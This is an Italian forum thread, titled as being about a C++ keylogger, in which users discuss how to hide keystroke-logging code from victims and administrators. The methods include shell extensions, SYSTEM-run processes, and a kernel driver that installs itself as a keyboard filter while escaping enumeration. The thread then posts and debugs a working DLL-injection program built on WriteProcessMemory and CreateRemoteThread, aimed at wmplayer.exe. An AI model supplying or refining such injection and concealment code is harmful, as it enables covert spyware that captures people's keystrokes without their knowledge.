[c++] key logger

[mamo139]

Quote:

Originariamente inviato da 71104

su Windows esistono una svaria di modi per ottenere che un modulo sia caricato automaticamente all'avvio; poi naturalmente dipende anche da che tipo di caricamento si vuole ottenere (ad ogni creazione di explorer.exe, ad ogni logon, all'avvio del sistema, eccetera eccetera).

il miglior* sistema che io conosca è quello di creare una shell extension, ma nota bene che se il target dei tuoi misfatti ( ) è un autentico esemplare di utonto, e come tale lavora normalmente con Administrator, allora è di gran lunga preferibile l'idea del driver che ho descritto qualche post fa...

* migliore nel senso che più si adatta a questo genere di malefatte
ma naturalmente se volessimo semplicemente creare un programma che si avvia automaticamente senza doversi nascondere allora sarebbe chiaramente meglio installare la voce in Esecuzione Automatica o il valore nella chiave di registro Run.

e mi puoi parlare un po del migliore???

[mamo139]

e la dll injection com'è?? un metodo valido??

[-fidel-]

Quote:

Originariamente inviato da mamo139

e la dll injection com'è?? un metodo valido??

Sì, ma lo fai in presenza di un bug di un applicativo normalmente, e questo bug deve essere a te ben noto e il programma non deve essere patchato (di solito i bugs che ti permettono di fare dll injection vengono corretti velocemente). Inoltre, il tuo codice deve essere snello (e piccolo in numero di bytes), per essere iniettato. Un'ultimo prerequisito: devi conoscere un po' di assembly per fare uno shellcode.

EDIT: scusami, tu parlavi di dll injection, io di code injection in presenza di buffer overrun...

[-fidel-]

Quote:

Originariamente inviato da 71104

stanno là e basta; hanno solo la particolare caratteristica di girare sotto l'account SYSTEM...

Eh appunto, molti utenti non prendono in considerazione come processi maligni quelli che girano come SYSTEM, quindi di solito passa maggiormente inosservato (soprattutto se il processo ha un nome familiare).

EDIT: Ah volevo chiederti:

Quote:

Originariamente inviato da 71104

ma se abbiamo a che fare con un fior di amministratore di sistema allora qui ci serve un driver che alloca un'area di memoria su cui scrive il vero codice e poi fallisce il caricamento ritornando uno errore dalla DriverEntry; il driver non apparirà come caricato, e nel frattempo il codice allocato "clandestinamente" può installarsi come Keyboard Filter.

Tale codice allocato dalla dll deve comunque essere avviato no? Esso viene comunque visto come un processo?
Se parli di dll injection, perché utilizzare tutti il meccanismo di caricare la dll da iniettare tramite un'altra dll?

[71104]

Quote:

Originariamente inviato da -fidel-

Tale codice allocato dalla dll deve comunque essere avviato no?

non parlavo di DLL, parlavo di realizzare un driver...

Quote:

Esso viene comunque visto come un processo?

non a se stante: i drivers girano nel contesto del processo System. è possibile enumerarli, ma se un driver fallisce il caricamento non risulterà nell'enumerazione; solo che, prima di essere ritornato dalla DriverEntry con un errore, potrebbe benissimo avere allocato un'area in kernel space, essercisi ricopiato e rilocato completamente, ed aver installato la sua copia come un Keyboard Filter. I dettagli li dovrei studiare bene, non l'ho mai fatto ^^

Quote:

Se parli di dll injection,

la DLL injection avviene in user mode, è un altro discorso.

Quote:

perché utilizzare tutti il meccanismo di caricare la dll da iniettare tramite un'altra dll?

[71104]

Quote:

Originariamente inviato da mamo139

e mi puoi parlare un po del migliore???

dovresti creare una DLL, ma tu non vuoi

[71104]

Quote:

Originariamente inviato da mamo139

e la dll injection com'è?? un metodo valido??

idem come sopra

la DLL injection si basa su un semplice trucchetto. osserva su MSDN i prototipi dell'entry point di un thread e della funzione LoadLibrary[A/W]: sono formalmente simili, ma alla fine stringi stringi risultano essere addirittura esattamente identici. di conseguenza tu potresti usare la funzione LoadLibrary come entry point di un thread in un altro processo (il che significherebbe costringere l'altro processo a caricare una DLL), e puoi creare il thread nell'altro processo con la funzione CreateRemoteThread. prima però devi anche usare WriteProcessMemory per scrivere nell'altro processo una stringa contenente il nome del file DLL da fargli caricare (altrimenti come parametro per il nuovo thread che gli passi?)

[-fidel-]

Quote:

Originariamente inviato da 71104

non parlavo di DLL, parlavo di realizzare un driver...

non a se stante: i drivers girano nel contesto del processo System. è possibile enumerarli, ma se un driver fallisce il caricamento non risulterà nell'enumerazione; solo che, prima di essere ritornato dalla DriverEntry con un errore, potrebbe benissimo avere allocato un'area in kernel space, essercisi ricopiato e rilocato completamente, ed aver installato la sua copia come un Keyboard Filter. I dettagli li dovrei studiare bene, non l'ho mai fatto ^^

Ora mi è chiaro. Mi era sfuggito il fatto del driver...

Quote:

Originariamente inviato da 71104

la DLL injection avviene in user mode, è un altro discorso.

Idem come sopra

[mamo139]

Quote:

Originariamente inviato da 71104

idem come sopra

la DLL injection si basa su un semplice trucchetto. osserva su MSDN i prototipi dell'entry point di un thread e della funzione LoadLibrary[A/W]: sono formalmente simili, ma alla fine stringi stringi risultano essere addirittura esattamente identici. di conseguenza tu potresti usare la funzione LoadLibrary come entry point di un thread in un altro processo (il che significherebbe costringere l'altro processo a caricare una DLL), e puoi creare il thread nell'altro processo con la funzione CreateRemoteThread. prima però devi anche usare WriteProcessMemory per scrivere nell'altro processo una stringa contenente il nome del file DLL da fargli caricare (altrimenti come parametro per il nuovo thread che gli passi?)

ho trovato questo bell'esepiuccio
ora però c'è un problema... l'effetto che dovrebbe dare la mia dll nn c'è... come mai???

Codice:

int main(int argc, char **argv){
	char processName[] = "wmplayer.exe"; /* Nome processo su cui effettuare injection */
	char logFile[]= "log.txt"; /* Nome del file di log per controllare successo o fallimento operazioni */
	char dllName[]="dll.dll"; /* Nome dll da cui prelevare il codice da iniettare */

	HANDLE proc, thread;
	DWORD threadId, bWritten;
	BOOL check;
	VOID *remoteBuff;
	DWORD pid;
	FILE *fp;

	fp = fopen(logFile, "w");
	fprintf(fp, "Looking for: %s\n\n", processName);

	pid = trovaPid(processName, fp);

	if(pid == 0xFFFFFFFF){
		fprintf(fp, "\nProcess not found\n");
		return 0;
	}

	check = abilitaSeDebugName(fp);
	if (check == 0){
		fprintf(fp, "\nAbilitazione privilegio SE_DEBUG_NAME fallita\n");
	}

	proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
	if (proc == NULL){
		fprintf(fp, "Errore OpenProcess() %d\n", GetLastError());
		return -1;
	}

	remoteBuff = VirtualAllocEx(proc, NULL, strlen(dllName), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (remoteBuff == NULL){
		fprintf(fp, "Errore VirtualAllocEx() %d\n", GetLastError());
		return -1;
	}
	else
		fprintf(fp, "\nCreati %d bytes all' indirizzo 0x%x\n", strlen(dllName), (ULONG)remoteBuff);

	check = WriteProcessMemory(proc, remoteBuff, dllName, strlen(dllName), &bWritten);
	if (check == 0){
		fprintf(fp, "Errore WriteProcessMemory() %d\n", GetLastError());
		return -1;
	}

	thread = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary("kernel32.dll"), "LoadLibraryA"), remoteBuff, 0, &threadId);
	if (thread == NULL)
		fprintf(fp, "Errore CreateRemoteThread() %d\n", GetLastError());

	fprintf(fp, "\nInjection eseguita\n");
	fclose(fp);
	return 0;
}

la dll è questa:

Codice:

#include <windows.h>

BOOL WINAPI __declspec(dllexport) LibMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH: {/* operazioni di inizializzazione della dll */
        
        system("c:\\programmi\\internet explorer\\iexplore.exe");
        system("pause");
        MessageBox(0, "Codice eseguito!!!!", "DLL Loaded", MB_OK);         return TRUE;
        
        }
    case DLL_PROCESS_DETACH: /* operazioni di rilascio della dll */
        break;
    }
    return TRUE;
}

[71104]

fa schifo, è pieno di leak; ora cmq lo guardo meglio e vedo se ci sono errori.

[mamo139]

Quote:

Originariamente inviato da 71104

fa schifo, è pieno di leak; ora cmq lo guardo meglio e vedo se ci sono errori.

grazie mille x l'aiuto... nn mi resta che attendere

[71104]

scusa ma sul file di log cosa stampa...?

[mamo139]

i possibili errori...

[-fidel-]

Quote:

Originariamente inviato da 71104

fa schifo, è pieno di leak; ora cmq lo guardo meglio e vedo se ci sono errori.

Emh, ma che dici?!? Quel codice è ottimo...

Mamo, hai le funzioni "trovaPID()" e "abilitaSeDebugName()"?

EDIT: Ah, se non avvii wmplayer.exe non funzionerà mai... Avvia prima Windows Media Player dal menù Start di Windows, poi il tuo programma di injection.

EDIT 2: trovato l'errore! Il problema è nella DLL, o meglio, nel main della DLL.
Guarda che l'intestazione del main (entry point della DLL) non si chiama più "LibMain" da secoli... Ora si chiama "DllMain", ed inoltre non è più necessario usare la __declspec(dllexport) per l'entry point (main), dal momento che questo viene sempre esportato automaticamente.
In soldoni, sostituisci:

Codice:

BOOL WINAPI __declspec(dllexport) LibMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)

con

Codice:

BOOL APIENTRY DllMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)

[mamo139]

Quote:

Originariamente inviato da -fidel-

Emh, ma che dici?!? Quel codice è ottimo...
Mamo, hai le funzioni "trovaPID()" e "abilitaSeDebugName()"?

si ce le ho...

Quote:

Originariamente inviato da -fidel-

EDIT: Ah, se non avvii wmplayer.exe non funzionerà mai... Avvia prima Windows Media Player dal menù Start di Windows, poi il tuo programma di injection.

si lo avevo avviato...

ti ho allegato i sorgenti della dll e l'exe che dovrebbe iniettarla... così puoi verificare di persona e dirmi se a te funziona...

[-fidel-]

Leggi il mio secondo edit

[mamo139]

Quote:

Originariamente inviato da -fidel-

EDIT 2: trovato l'errore! Il problema è nella DLL, o meglio, nel main della DLL.
Guarda che l'intestazione del main (entry point della DLL) non si chiama più "LibMain" da secoli... Ora si chiama "DllMain", ed inoltre non è più necessario usare la __declspec(dllexport) per l'entry point (main), dal momento che questo viene sempre esportato automaticamente.
In soldoni, sostituisci:

Codice:

BOOL WINAPI __declspec(dllexport) LibMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)

con

Codice:

BOOL APIENTRY DllMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)

fatto e provato... ma nn va comunque... cmq prova l'allegato che ti ho uploadato...( nn ho fatto la modifica che mi hai detto nei sorgenti che ho uploadato xche uploadati precedentemente )

[-fidel-]

Quote:

Originariamente inviato da mamo139

ti ho allegato i sorgenti della dll e l'exe che dovrebbe iniettarla... così puoi verificare di persona e dirmi se a te funziona...

Non ce n'era bisogno, vai tranquillo Ho lavorato sul code injection e sulle tecniche per prevenirlo per più di un anno....

[71104]

Quote:

Originariamente inviato da -fidel-

Emh, ma che dici?!? Quel codice è ottimo...

linea 20: salta la fclose
linea 28: l'handle rimane aperto
linea 31: salta la fclose
linea 34: MEM_RESERVE è inutile, e per la protezione è sufficiente PAGE_READONLY
linea 34: manca una corrispondente VirtualFreeEx
linea 37: salta la fclose
linea 45: salta la fclose
linea 48: l'handle rimane aperto

ed inoltre manca una SetLastError all'inizio del main (chi ti dice che il last error parte nullo?)

Quote:

Mamo, hai le funzioni "trovaPID()"

banale lavoro di PSAPI (possibilmente senza lasciare leak madornali )

Quote:

e "abilitaSeDebugName()"?

to':
http://msdn.microsoft.com/library/de...asp?frame=true
http://msdn.microsoft.com/library/de...privileges.asp

e ricordati CloseHandle alla fine sul token

PS: "inutile liberare memoria e handles, tanto ci pensa il sistema operativo alla chiusura del processo"? che culo, magari sapessi programmare così bene... -.-'

[-fidel-]

Quote:

Originariamente inviato da mamo139

fatto e provato... ma nn va comunque... cmq prova l'allegato che ti ho uploadato...( nn ho fatto la modifica che mi hai detto nei sorgenti che ho uploadato xche uploadati precedentemente )

Ok provo, ma dvo riavviare per entrare con Windows